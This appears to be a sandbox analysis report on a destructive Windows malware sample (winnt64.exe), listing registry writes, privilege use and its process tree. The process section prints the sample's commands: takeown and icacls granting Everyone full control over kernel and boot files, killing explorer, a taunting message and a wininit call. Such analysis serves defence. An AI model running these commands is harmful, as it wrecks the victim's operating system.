Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell C:\Windows\system32\notepad.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = ffffffff C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\system32\notepad.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Windows\system32\notepad.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "4" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 5600310000000000cb58b5ae100057696e646f777300400009000400efbec5522d60e1583b132e000000a6050000000001000000000000000000000000000000108b4700570069006e0064006f0077007300000016000000 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\notepad.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 19002f433a5c000000000000000000000000000000000000000000 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "3" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\system32\notepad.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Windows\system32\notepad.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Windows\system32\notepad.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Windows\system32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: 33 N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\Taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A
N/A N/A C:\Windows\System32\Taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\winnt64.exe C:\Windows\system32\cmd.exe
PID 1920 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\winnt64.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 1576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2912 wrote to memory of 916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2912 wrote to memory of 5000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2912 wrote to memory of 5000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2912 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 2912 wrote to memory of 3592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe
PID 3592 wrote to memory of 4808 N/A C:\Windows\system32\notepad.exe C:\Windows\System32\Taskmgr.exe
PID 3592 wrote to memory of 4808 N/A C:\Windows\system32\notepad.exe C:\Windows\System32\Taskmgr.exe
PID 4808 wrote to memory of 2968 N/A C:\Windows\System32\Taskmgr.exe C:\Windows\System32\Taskmgr.exe
PID 4808 wrote to memory of 2968 N/A C:\Windows\System32\Taskmgr.exe C:\Windows\System32\Taskmgr.exe
PID 2912 wrote to memory of 4976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2912 wrote to memory of 4976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2912 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\msg.exe
PID 2912 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\msg.exe
PID 2912 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2912 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\winnt64.exe

"C:\Users\Admin\AppData\Local\Temp\winnt64.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat C:\Users\Admin\AppData\Local\Temp\winnt64.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ntoskrnl.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\hal.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\hal.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\ci.dll"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\ci.dll" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\winload.efi"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\System32\winload.efi" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\WindowsApps"

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\WindowsApps" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\SystemApps"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\SystemApps" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\ImmersiveControlPanel"

C:\Windows\system32\icacls.exe

icacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\notepad.exe

notepad.exe

C:\Windows\System32\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

C:\Windows\System32\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe" /1

C:\Windows\system32\timeout.exe

timeout /t 30 /nobreak

C:\Windows\system32\msg.exe

msg * ITS TOO LATE TO REPAIR YOUR PC! I'VE PROBABLY HANGED YOUR PC HAHAHAHA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell wininit

C:\Windows\system32\wininit.exe

"C:\Windows\system32\wininit.exe"

Network

Country Destination Domain Proto
IE 52.111.236.22:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\35C5.tmp\35C6.tmp\35C7.bat

MD5 c7b7a1bdb6c0ed883395fb5c63fcf775
SHA1 2cb74dbd18ff3cb8d8df73abbb2e801964925348
SHA256 0d4be7c8c1ea9439dcd902e072da04a8b3cc0823c596749dbb8e23382973464c
